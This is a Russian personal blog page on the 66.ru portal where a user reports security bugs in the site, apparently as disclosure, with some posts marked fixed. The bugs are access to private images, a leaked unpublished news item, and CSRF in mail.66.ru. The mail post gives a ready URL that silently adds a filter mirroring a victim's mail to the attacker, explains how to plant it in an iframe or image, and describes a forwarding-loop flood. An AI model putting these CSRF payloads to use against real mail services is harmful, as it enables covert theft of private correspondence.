Личный блог пользователя Render

Современный портал Екатеринбурга

курсы валют	сегодня
$ 30.3626	+ 0.0026
€ 39.7841	− 0.0543

-12 слабый снег

ночью: -19° C
завтра: -15° C
послезавтра: -25° C

погода в Екатеринбурге

/ Личный блог пользователя Render

Профиль

Блог

Фото

Видео

Render В России 3 беды: дураки, дороги и домены .РФ	карма 27,1


	метки записей: 66.ru Render was here mail mail.66.ru php reborn Амиров Новый Год Реклама гарри поттер екабу игромания медиасайт не 66.ru опрос почта уралвеб

2012

Январь

пн

вт

ср

чт

пт

сб

вс


	ответы: 66 сам нам его говорит, даже если изображение запаролено\запривачено. сказал Render к записи Просмотр запароленых и заприваченых изображений[исправлено] Осталось только выяснить, как определить photo_id запароленного изображения. :) сказал Россен к записи Просмотр запароленых и заприваченых изображений[исправлено] дак видимо и нашел,тока тихо молчит(наслаждаетцо)[:- D] сказал RediskaPoleznaya к записи Просмотр запароленых и заприваченых изображений[исправлено] Вы думаете, что я не нашел? Надо было. сказал Render к записи Просмотр запароленых и заприваченых изображений[исправлено] надо было ню найти!!!))) сказал Blander к записи Просмотр запароленых и заприваченых изображений[исправлено] А редиска красивая на картинке))) сказал RediskaPoleznaya к записи Просмотр запароленых и заприваченых изображений[исправлено] Этот путь слишком прост. сказал Render к записи Просмотр запароленых и заприваченых изображений нагло)) можно было попросить и я бы открыла доступ) сказал sfacciato к записи Просмотр запароленых и заприваченых изображений Псот - тупой пеар редакции ШесятШесть сказал КЗ к записи Обсуждение новости: Вступает в свои права Новый 2011 год наглядный пример того что даже разбираясь в веб-технологиях можно быть круглым дураком сказал -Дон Хулио- к записи Обсуждение новости: Вступает в свои права Новый 2011 год

Суббота, 30 июля 2011

16:59

Просмотр запароленых и заприваченых изображений[исправлено]

http://img.66.ru/image/e91b2b4ea92870f6050bb6b8c7eb0223/47dd6289/0/94/65/946584_normal.jpg

Прямые ссылки на изображения 66 представляют собой нечто вроде:
http://img.66.ru/image/e91b2b4ea92870f6050bb6b8c7eb0223/47dd6289/0/94/65/946584_normal.jpg
Куча каких-то хэшэй. Я, как недалёкий, ничего не понял и пошел в обход.

66.ru

216 просмотров

8 комментариев

Пятница, 31 декабря 2010

18:55

Обсуждение новости: Вступает в свои права Новый 2011 год

Редакция 66.ru от всей души поздравляет с этим знаменательным событием своих обожаемых читателей.

http://www.66.ru/news/society/75721/

Вычислил номер, вычислил заголовок и подзоголовок, даже картинку:

ссылка

А саму новость невидно, придется ждать.

UPD: Дааа.... Нужный баг найден, полный текст новости получен:

66.ru, Новый Год

306 просмотров

-7

7 комментариев

Четверг, 11 ноября 2010

12:00

Почта на 66.ru[вроде-как исправленно]

Первое, следующая ссылка добавляет фильтр на почту, который пересылает все сообщения злоумышленнику:

http://mail.66.ru/?controller=options&action=saveNewFilter&page=showUserFilters&ruleSelect1=Message+Size&opSelect1=less+than&ruleText1=-1&actionSelect1=Mirror+to&actionText1=Render%4066.ru

Размещаем её в iframe или как src у картинки на сайте злоумышленника и читаем чужую почту.

Второе, следующая ссылка изменяет имя пользователя на "ololo" и подпись на "hello":

http://mail.66.ru/?controller=options&action=saveOptions&page=showUserData&user_name=ololo&user_signature=hello

Третье, следующая ссылка создаёт папку с именем "ololo":

http://mail.66.ru/?controller=options&action=createNewFolder&new_folder=ololo

Компот, если создать фильтр ( а лучше несколько... ) пересылающих все письма самому себе, то сервер уходит в некоторое подобие рекурсии... Защита какае-то от этого есть, ибо:
При одном фильтре пересылка идёт 16 раз.
При двух фильтрах пересылка идёт 800+ раз. Я думал вобще не остановится...